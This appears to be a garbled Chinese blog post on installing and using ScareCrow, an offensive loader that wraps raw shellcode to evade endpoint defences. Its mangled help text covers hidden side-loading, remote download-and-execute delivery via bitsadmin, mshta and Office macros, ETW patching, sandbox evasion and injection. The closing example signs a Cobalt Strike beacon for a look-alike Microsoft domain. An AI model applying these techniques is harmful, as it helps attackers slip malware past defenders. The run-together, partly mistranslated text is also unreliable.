项目地址https://github.com/optiv/scarecrow
安装方法首先下载golang、openssl、osslsigncode、mingw-w 64 aptinstallgolangopensslosslsigncodemingw-w64-y源代码: 3334/scarecrow-h _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _。 youmustunderstandismorethanamereobstacle.fearisateacher.thefirstoneyoueverhad .”usage of./scarecrow :-istringpathtotheraw 64-bit shellcode.- loaderstringsetsthetypeofprocessthatwillsideloadthemaliciouspayload 33 payload.(thistypedoesnotbenfitfromanysideloading )清洁蜜蜂)。 控制- loadsahiddencontrolapplet-theprocessnamewouldberundll 32 if-oisspecifiedajscriptloaderwillbegenerated .清洁蜜蜂] dll-generatesjustadllfile.canexecutedwithcommandssuchasrundll 32 or regsvr 32 withdllregisterserver, dlgetclassobjectasexportfunctions .清洁蜜蜂] excel-loadsintoahiddenexcelprocessusingajscriptloader .清洁蜜蜂] msiexec-loadsintomsiexecprocessusingajscriptloader .清洁蜜蜂] wscript-loadsintowscriptprocessusingajscriptloader.(-ostod . ifloaderissettodllorbinarythisoptionisnotrequired.- configfilestringthepathtoajsonbasedconfigurationfiletogeneratecustom sethethedefaultones.- consoleonlyforbinarypayloads-generatesverboseconsoleinformationwhenthepayloads-generatesverboseconconed d.thiswilldisablethehiddenwindowfeature.- deliverystringgeneratesaone-linercommandtownloadandexecutethepayloadremototuture bits-generatesabitsadminonelinercommandtodownload,executeandremovetheloader (兼容性withbinary,控制, Excel and Wscript Loaders (.漂亮的蜜蜂) ] HTA-generatesablankhtafilecontainingtheloaderalongwithamshtacommandexecutetheloaderremotelyinthebackground (ol and excel loaderader ) tesanofficemacrothatwilldownloadandexecutetheloaderremotely (兼容性withcontrol excelandwscriptloaders (-domainstringthededers - etwenablesetwpatchingtopreventetweventsfrombeinggenerated-injectionstringenablesprocessinjectionmodeandspecifythepathepathtothe for the path ) .-passwordstringthepasswordforcodesigningcert.required when-validisused.- sandboxenablessandboxevasionusingisdomainedonedjodjon eadllloaderthatwillnotremovingtheedrhooksinsystemdlsandonlyusecustomsyscalls (settofalsebydefa ult )-urlstringurlassociatededefa - validstringthepathtoavalidcodesigningcert.used instead-domainifavalidcodesigningcertisdesired .使用基本用法cs创建64位原始型payload
./scarecrow-I beacon.bin-domain www.microft.com-etw-sandbox #-I :指定原始文件# -domain :签名域名#-etw :不存在etw